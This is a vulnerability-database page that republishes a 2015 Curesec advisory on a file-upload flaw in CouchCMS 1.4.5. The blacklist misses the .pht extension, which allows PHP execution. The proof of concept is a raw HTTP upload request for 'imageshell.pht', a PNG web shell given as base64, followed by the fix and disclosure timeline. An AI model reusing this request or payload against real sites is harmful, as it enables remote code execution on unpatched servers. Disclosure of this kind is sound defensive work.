Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CouchCMS 1.4.5 Code Execution

🗓️ 23 Dec 2015 00:00:00Reported by Tim CoenType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 39 Views

CouchCMS 1.4.5 Code Execution security issue, allows bypassing file restrictions and executing PHP cod

Code
`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: CouchCMS 1.4.5  
Fixed in: 1.4.7  
Fixed Version Link: http://www.couchcms.com/products/  
Vendor Website: http://www.couchcms.com/  
Vulnerability Type: Code Execution  
Remote Exploitable: Yes  
Reported to vendor: 11/17/2015  
Disclosed to public: 12/21/2015  
Release mode: Coordinated Release  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
CVSS  
  
High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C  
  
Description  
  
When uploading a file, the file extension is checked against a blacklist. This  
blacklist misses at the least pht, which is executed by most default Apache  
configurations. The uploaded file must be a valid image file, but an attacker  
can bypass this restriction.  
  
Admin credentials are required to upload files.  
  
A htaccess file forbids the execution of PHP code in uploaded files, but some  
servers are configured to not read htaccess files, for example for performance  
reasons. Apache for example ignores htaccess files by default since version  
2.3.9.  
  
3. Proof of Concept  
  
  
POST /CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61 HTTP/1.1  
Host: localhost  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------18851501621445926637695954351  
Content-Length: 529  
  
-----------------------------18851501621445926637695954351  
Content-Disposition: form-data; name="upload[]"; filename="imageshell.pht"  
Content-Type: application/octet-stream  
  
[base64: iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAIAAAD8GO2jAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAYElEQVRIiWNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PliAgYHBc143k/yPi9t+X9N9qif38ePJv1/vBnyyMDBj2bln/dk9G84yjIJRMApGwSgYBaNgFIyCUTAKhg0AAIGyGwIHeA0MAAAAAElFTkSuQmCC]  
  
The shellcode used can be found here: https://www.idontplaydarts.com/2012/06/  
encoding-web-shells-in-png-idat-chunks/  
  
4. Solution  
  
To mitigate this issue please upgrade at least to version 1.4.7:  
  
http://www.couchcms.com/products/  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
11/17/2015 Informed Vendor about Issue  
11/18/2015 Vendor sends fixes for confirmation  
11/20/2015 Verified fixes  
11/24/2015 Vendor releases fix  
12/21/2015 Disclosed to public  
  
  
Blog Reference:  
https://blog.curesec.com/article/blog/CouchCMS-145-Code-Execution-125.html  
  
--  
blog: https://blog.curesec.com  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Romain-Rolland-Str 14-24  
13089 Berlin, Germany  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Dec 2015 00:00Current
couchcms 1.4.5code executionfile uploadblacklistapache configurationsecurity advisorycuresec gmbh
39